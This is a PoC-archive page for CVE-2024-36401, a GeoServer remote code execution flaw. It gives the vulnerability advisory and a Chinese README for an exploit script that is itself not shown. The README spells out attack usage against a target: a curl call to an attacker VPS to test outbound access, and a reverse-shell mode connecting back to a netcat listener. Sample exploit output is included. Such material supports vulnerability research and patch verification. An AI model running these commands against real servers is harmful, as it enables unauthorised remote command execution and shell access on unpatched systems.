Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-36401 PoC — Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver

Source
https://github.com/URJACK2025/CVE-2024-36401
Associated Vulnerability
Title:Remote Code Execution (RCE) vulnerability in evaluating property name expressions in Geoserver (CVE-2024-36401)
Description:GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Description
An Python Exp For "GeoServer"
Readme
# CVE-2024-36401 GeoServer 漏洞利用工具

## 漏洞简介
CVE-2024-36401 是 GeoServer 中的一个远程命令执行漏洞,攻击者可以通过构造特定的 WFS (Web Feature Service) 请求,在未授权的情况下执行任意命令。

## 环境要求
- Python 3.x
- 安装必要依赖:`pip install requests`

## 使用方法
该工具支持两种使用模式:`cmd` 模式(直接执行命令)和 `reverse` 模式(建立反弹Shell)。

### 1. 测试目标是否出网
假设VPS地址为 `111.46.112.85`,
使用 `cmd` 模式执行 curl 命令,测试目标服务器是否能够访问外部网络:

```shell
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"
```

**验证方法**:在 VPS 上启动 HTTP 服务器接收请求

```shell
# 在 VPS 上执行
python -m http.server 8090
```

如果成功接收到回弹信息,会看到类似以下输出:

```
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -
```

### 2. 建立反弹Shell连接
使用 `reverse` 模式建立反弹Shell连接到指定的 VPS 和端口:

**步骤1**:在 VPS 上设置监听端口

```shell
# 在 VPS 上执行
nc -lvp 6666
```

**步骤2**:执行漏洞利用工具发起反弹连接

```shell
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666
```

执行后,工具会显示类似以下输出:

```
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea
```

此时,如果利用成功,VPS 上的 nc 监听将会接收到反弹的 Shell 会话。

## 工具参数说明

```
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
```

- `cmd`:执行单条命令模式
- `reverse`:反弹Shell模式
- `<target>`:目标服务器地址和端口,格式为 `ip:port`
- `<command>`:在目标服务器上执行的命令
- `<vps_ip>`:VPS服务器的IP地址
- `<vps_port>`:VPS上监听的端口号

## 漏洞原理
该漏洞利用了 GeoServer WFS 服务中的安全缺陷,通过在 `valueReference` 中注入 Java 代码来执行系统命令。工具通过构造包含恶意代码的 XML Payload,发送到 GeoServer 的 WFS 接口,从而实现远程命令执行。

## 注意事项
1. 本工具仅用于安全研究和漏洞验证,请勿用于未授权的测试。
2. 使用本工具造成的任何后果,使用者自行承担责任。
3. 在使用反弹Shell功能时,确保您有权限访问目标系统并在相关法律法规允许的范围内进行操作。
4. 如果是靶场测试环境,靶场搭建方可能为加大难度,修正一些默认路由,导致带来的EXP无法使用的问题。这时,可能需要修正字段`/geoserver/wfs`为对应的内容。

## 修复建议
及时更新 GeoServer 到官方发布的安全版本,并遵循安全最佳实践配置服务器。
File Snapshot

 [4.0K]  /data/pocs/852f5e8758798f451240e8242a3e9cf99df0e5c1
├── [3.0K]  exp.py
└── [3.4K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →